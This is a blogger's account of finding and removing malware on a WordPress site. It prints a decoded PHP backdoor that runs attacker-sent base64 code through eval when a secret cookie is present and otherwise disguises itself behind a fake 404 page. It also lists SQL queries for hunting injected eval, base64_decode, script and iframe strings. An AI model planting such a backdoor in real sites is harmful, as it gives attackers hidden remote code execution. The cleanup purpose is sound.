Fixing My Wordpress Malware Problem
• ∞
Here are the contents of the file detected by WP-Malwatch:
When I decoded it, it translated to:
<?php $YjlSRnt=’eval(base64_decode(\’ZXJyb3JfcmVwb3J0aXhpdCg this went on for about 2000 lines pOwp9\’));’;
In the source of the pages my site was serving to you, that translated to:
<?php
error_reporting(0);
$md5_cookie_shell=’e954f2b73a1137e7cd7bfcc9df464eab’;
$md5_name_cookie_shell=’7d9897ac32d34e965e8a72239fdb3afa’;
$md5_name_cookie_eval=’2cffc36de4a1abcd64d996d3e22c8fd0’;
$md5_cookie_eval=’b7ecebf10cf92cd63d6f9235e66119cd’;
foreach($_COOKIE as $key => $value){
if(md5($key)==$md5_name_cookie_eval and md5($value)==$md5_cookie_eval){
if(isset($_POST[’code’])) {
eval(base64_decode($_POST[’code’]));exit;
}
break;
}
}
$local_param=false;
foreach($_COOKIE as $key => $value){
if(md5($key)==$md5_name_cookie_shell and md5($value)==$md5_cookie_shell){
$local_param=true;
break;
}
}
if(!$local_param){
function my_armor($post,$get,$cookie){
$post_arr=implode(‘.’,$post);
$get_arr=implode(‘.’,$get);
$cook_arr=implode(‘.’,$cookie);
$post_arr_key=implode(‘.’,@array_flip($post));
$get_arr_key=implode(‘.’,@array_flip($get));
$other_shtuki=@file_get_contents(‘php://input’);
$cracktrack = strtolower($post_arr.$get_arr.$post_arr_key.$get_arr_key.$cook_arr_key.$other_shtuki);
$wormprotector = array(‘base64’,’user_pass’,’substring’,’or id=’,’eval(‘,’nutch’,’create_function’);
$checkworm = str_replace($wormprotector, ‘*’, $cracktrack);
if ($cracktrack != $checkworm) @wp_die(__(‘You do not have sufficient permissions’))or die(“”);
}
function error404(){
header(“HTTP/1.1 404 Not Found”);
header(“Connection: close”);
echo “
Not Found
The requested URL “.$\_SERVER\[‘REQUEST\_URI’\].” was not found on this server
”.((“” != $\_SERVER\[‘SERVER\_SIGNATURE’\]) ? $\_SERVER\[‘SERVER\_SIGNATURE’\] : ($\_SERVER\[‘SERVER\_SOFTWARE’\].” Server at “.$\_SERVER\[‘SERVER\_NAME’\].” Port “.$\_SERVER\[‘SERVER\_PORT’\])) .”
”;
}
my_armor($_POST,$_GET,$_COOKIE);
error404();
}
if ($local_param){
$c=’ZXJyb3JfcmV this went on for a few thousand lines G8gJzwvYm9keT48L2h0bWw+Jzs=’;
$c=base64_decode($c);
eval($c);
exit();
}
And here are the queries I used when trying to find the culprit. Simply replace BADSITENAME with the names of sites indicated by Google Webmaster Tools:- select * from wp_options where option_name = ‘wp_check_hash’ - select * from wp_options where option_name = ‘class_generic_support’ - select * from wp_options where option_name = ‘widget_generic_support’ - select * from wp_options where option_name = ‘ftp_credentials’ - select * from wp_options where option_name = ‘fwp’ - select * from wp_options where option_name LIKE ‘rss_%’ (EXCEPT: rss_language, rss_use_excerpt, and rss_excerpt_length) - select * from wp_comments where comment_author_email like ‘%eval(%’ or comment_author_url like ‘%eval(%’ or comment_content like ‘%eval(%’ - select * from wp_postmeta where meta_value like ‘%eval(%’ - select * from wp_posts where post_content like ‘%eval(%’ or post_title like ‘%eval(%’ - select * from wp_comments where comment_author_email like ‘%base64_decode%’ or comment_author_url like ‘%base64_decode%’ or comment_content like ‘%base64_decode%’ - select * from wp_postmeta where meta_value like ‘%base64_decode%’ - select * from wp_posts where post_content like ‘%base64_decode%’ or post_title like ‘%base64_decode%’ - select * from wp_comments where comment_author_email like ‘%BADSITE1.biz%’ or comment_author_url like ‘%BADSITE1.biz%’ or comment_content like ‘%BADSITE1.biz%’ - select * from wp_comments where comment_author_email like ‘%BADSITE2.name%’ or comment_author_url like ‘%BADSITE2.name%’ or comment_content like ‘%BADSITE2.name%’ - select * from wp_comments where comment_author_email like ‘%BADSITE3.us%’ or comment_author_url like ‘%BADSITE3.us%’ or comment_content like ‘%BADSITE3.us%’ - select * from wp_comments where comment_author_email like ‘%<script%’ or comment_author_email like ‘%<script%’ or comment_author_url like ‘%<script%’ or comment_author_url like ‘%<script%’ or comment_content like ‘%<script%’ or comment_content like ‘%<script%’ - select * from wp_comments where comment_author_email like ‘%<iframe%’ or comment_author_email like ‘%<iframe%’ or comment_author_url like ‘%<iframe%’ or comment_author_url like ‘%<iframe%’ or comment_content like ‘%<iframe%’ or comment_content like ‘%<iframe%’ - select * from wp_postmeta where meta_value like ‘%BADSITE1.biz%’ - select * from wp_postmeta where meta_value like ‘%BADSITE2.name%’ - select * from wp_postmeta where meta_value like ‘%BADSITE3.us%’ - select * from wp_postmeta where meta_value like ‘%<script%’ or meta_value like ‘%<script%’ - select * from wp_postmeta where meta_value like ‘%<iframe%’ or meta_value like ‘%<iframe%’ - select * from wp_posts where post_content like ‘%BADSITE1.biz%’ or post_title like ‘%BADSITE1.biz%’ - select * from wp_posts where post_content like ‘%BADSITE2.name%’ or post_title like ‘%BADSITE2.name%’ - select * from wp_posts where post_content like ‘%BADSITE3.us%’ or post_title like ‘%BADSITE3.us%’ - select * from wp_posts where post_content like ‘%<script%’ or post_content like ‘%<script%’ or post_title like ‘%<script%’ or post_title like ‘%<script%’ - select * from wp_posts where post_content like ‘%<iframe%’ or post_content like ‘%<iframe%’ or post_title like ‘%<iframe%’ or post_title like ‘%<iframe%’
Comments from my old blog:
U.C. said: What a pain at 2010-08-26 07:10:27